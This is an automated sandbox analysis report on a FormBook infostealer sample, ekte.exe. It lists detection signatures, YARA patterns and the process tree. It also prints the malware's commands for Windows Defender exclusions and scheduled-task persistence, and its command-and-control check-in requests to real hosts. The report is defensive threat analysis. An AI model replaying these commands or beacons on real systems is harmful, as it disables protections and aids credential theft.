Windows Analysis Report
ekte.exe

Overview

General Information

Sample name:ekte.exe
Analysis ID:1538477
MD5:a0f5d21ab28654f9310e591044950160
SHA1:2da8c07b8f8e3b1ff29cb2f7db8419642c0a42e5
SHA256:c74e38c2e961cbbc34e20669e3deb4b31beebc94824b096c88d8aad8b75c4dcf

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • ekte.exe (PID: 3408 cmdline: "C:\Users\user\Desktop\ekte.exe" MD5: A0F5D21AB28654F9310E591044950160)
    • powershell.exe (PID: 3520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • powershell.exe (PID: 3584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • schtasks.exe (PID: 3616 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • ekte.exe (PID: 3752 cmdline: "C:\Users\user\Desktop\ekte.exe" MD5: A0F5D21AB28654F9310E591044950160)
      • BuhvZTwGQCD.exe (PID: 2424 cmdline: "C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • findstr.exe (PID: 728 cmdline: "C:\Windows\SysWOW64\findstr.exe" MD5: 18F02C555FBC9885DF9DB77754D6BB9B)
          • BuhvZTwGQCD.exe (PID: 1564 cmdline: "C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1756 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • taskeng.exe (PID: 3828 cmdline: taskeng.exe {F5042694-6DBB-4431-8D77-CD30DFD414D8} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • eFDiSxeTfjUqTk.exe (PID: 3868 cmdline: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe MD5: A0F5D21AB28654F9310E591044950160)
      • powershell.exe (PID: 3932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • powershell.exe (PID: 4008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 4084 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • eFDiSxeTfjUqTk.exe (PID: 3056 cmdline: "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" MD5: A0F5D21AB28654F9310E591044950160)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bed0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13fef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f1b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x172d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
8.2.ekte.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
8.2.ekte.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e3b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x164d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
8.2.ekte.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
8.2.ekte.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f1b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x172d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ekte.exe", ParentImage: C:\Users\user\Desktop\ekte.exe, ParentProcessId: 3408, ParentProcessName: ekte.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe", ProcessId: 3520, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe, ParentImage: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe, ParentProcessId: 3868, ParentProcessName: eFDiSxeTfjUqTk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp", ProcessId: 4084, ProcessName: schtasks.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\ekte.exe", ParentImage: C:\Users\user\Desktop\ekte.exe, ParentProcessId: 3408, ParentProcessName: ekte.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp", ProcessId: 3616, ProcessName: schtasks.exe
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\findstr.exe, ProcessId: 728, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ekte.exe", ParentImage: C:\Users\user\Desktop\ekte.exe, ParentProcessId: 3408, ParentProcessName: ekte.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe", ProcessId: 3520, ProcessName: powershell.exe
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3520, TargetFilename: C:\Users\user\AppData\Local\Temp\spbxmlzn.23j.ps1

            Persistence and Installation Behavior

            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\ekte.exe", ParentImage: C:\Users\user\Desktop\ekte.exe, ParentProcessId: 3408, ParentProcessName: ekte.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp", ProcessId: 3616, ProcessName: schtasks.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-10-21T13:15:20.479155+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.22 | 49167 | 3.33.130.190 | 80 | TCP
            2024-10-21T13:15:44.341147+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.22 | 49173 | 185.174.173.22 | 80 | TCP
            2024-10-21T13:16:07.187952+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.22 | 49177 | 162.0.238.246 | 80 | TCP
            2024-10-21T13:16:20.496951+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.22 | 49181 | 15.197.148.33 | 80 | TCP
            2024-10-21T13:16:34.567266+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.22 | 49185 | 206.119.82.148 | 80 | TCP
            2024-10-21T13:16:48.792562+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.22 | 49189 | 15.197.148.33 | 80 | TCP
            2024-10-21T13:15:35.537377+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.22 | 49170 | 185.174.173.22 | 80 | TCP
            2024-10-21T13:15:39.177209+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.22 | 49171 | 185.174.173.22 | 80 | TCP
            2024-10-21T13:15:40.619644+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.22 | 49172 | 185.174.173.22 | 80 | TCP
            2024-10-21T13:15:57.582707+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.22 | 49174 | 162.0.238.246 | 80 | TCP
            2024-10-21T13:16:00.822682+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.22 | 49175 | 162.0.238.246 | 80 | TCP
            2024-10-21T13:16:02.679402+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.22 | 49176 | 162.0.238.246 | 80 | TCP
            2024-10-21T13:16:12.243108+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.22 | 49178 | 15.197.148.33 | 80 | TCP
            2024-10-21T13:16:15.421025+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.22 | 49179 | 15.197.148.33 | 80 | TCP
            2024-10-21T13:16:17.343047+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.22 | 49180 | 15.197.148.33 | 80 | TCP
            2024-10-21T13:16:25.531397+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.22 | 49182 | 206.119.82.148 | 80 | TCP
            2024-10-21T13:16:29.267849+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.22 | 49183 | 206.119.82.148 | 80 | TCP
            2024-10-21T13:16:30.703523+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.22 | 49184 | 206.119.82.148 | 80 | TCP
            2024-10-21T13:16:39.635129+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.22 | 49186 | 15.197.148.33 | 80 | TCP
            2024-10-21T13:16:42.788385+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.22 | 49187 | 15.197.148.33 | 80 | TCP
            2024-10-21T13:16:44.720576+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.22 | 49188 | 15.197.148.33 | 80 | TCP
            2024-10-21T13:16:53.831892+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.22 | 49190 | 208.91.197.27 | 80 | TCP
            2024-10-21T13:15:35.537377+0200 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.22 | 49170 | 185.174.173.22 | 80 | TCP

            AV Detection

            Source: ekte.exeAvira: detected
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeAvira: detection malicious, Label: TR/Kryptik.oucnm
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeReversingLabs: Detection: 63%
            Source: ekte.exeReversingLabs: Detection: 63%
            Source: Yara matchFile source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeJoe Sandbox ML: detected
            Source: ekte.exeJoe Sandbox ML: detected
            Source: ekte.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: ekte.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BuhvZTwGQCD.exe, 0000000F.00000000.392786817.00000000003EE000.00000002.00000001.01000000.0000000B.sdmp, BuhvZTwGQCD.exe, 00000014.00000000.430916878.00000000003EE000.00000002.00000001.01000000.0000000B.sdmp
            Source: Binary string: findstr.pdb source: ekte.exe, 00000008.00000002.417831173.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, ekte.exe, 00000008.00000002.417831173.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404452776.0000000000519000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404444486.0000000000512000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626564118.000000000051F000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404459780.000000000051E000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626548218.0000000000514000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ekte.exe, ekte.exe, 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 00000012.00000002.424622705.0000000000B9C000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000003.417719669.0000000001FA0000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.626959404.0000000002130000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.626959404.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000003.414891316.0000000001E40000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\ekte.exeCode function: 4x nop then jmp 00CA275Bh0_2_00CA1E3F
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeCode function: 4x nop then jmp 00A5202Bh10_2_00A5170F

            Networking

            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49167 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49174 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49183 -> 206.119.82.148:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49184 -> 206.119.82.148:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49176 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49187 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49173 -> 185.174.173.22:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49189 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49170 -> 185.174.173.22:80
            Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.22:49170 -> 185.174.173.22:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49182 -> 206.119.82.148:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49172 -> 185.174.173.22:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49179 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49185 -> 206.119.82.148:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49178 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49190 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49186 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49180 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49177 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49181 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49175 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49171 -> 185.174.173.22:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49188 -> 15.197.148.33:80
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeDNS query: www.guldeu.xyz
            Source: Joe Sandbox ViewIP Address: 162.0.238.246 162.0.238.246
            Source: Joe Sandbox ViewIP Address: 15.197.148.33 15.197.148.33
            Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
            Source: Joe Sandbox ViewASN Name: ITLDC-NLUA ITLDC-NLUA
            Source: C:\Windows\SysWOW64\findstr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3180000[1].zipJump to behavior
            Source: global trafficHTTP traffic detected: GET /7qh8/?o0I8bJWh=30gz3aeCGXts4Q76IE+H941JnGeso7u8ST9k2gxA0wQlWv8qAc7eS7l6bdvqrf9uLD1EZ4RKxD3BFAyB/gyNnMcHzfUP1SI6JZ3kLHzdYP32mYCFOTVusz8SPvQZ&IzCDX=JREpwHC8S HTTP/1.1Host: www.deikamalaharris.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2021/sqlite-dll-win32-x86-3340000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /2017/sqlite-dll-win32-x86-3180000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /0804/?o0I8bJWh=7cQ5BE5RBCqgXF7xrBGoHohDXivjQLfe2KgDJ9LuiE6tpBU04a3sAbwq5Q7Yjj3JjwmtcjT9zhxyx84N9Ed0ZJTtf47MgLeYfgSXfectTV2gRR6PHDayMxuKrOIC&IzCDX=JREpwHC8S HTTP/1.1Host: www.rockbull.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qd68/?o0I8bJWh=CMk3jWV7n2ud16JbSoz++xJaAy6tYmolV54GWsIImY9wr32Fxex2EERnMtANYc4DvCE1goWK72es3TtLYGEc3O5acPz147mgbIRl7hCPTM53qHiPKqWo/3UkWZwG&IzCDX=JREpwHC8S HTTP/1.1Host: www.guldeu.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
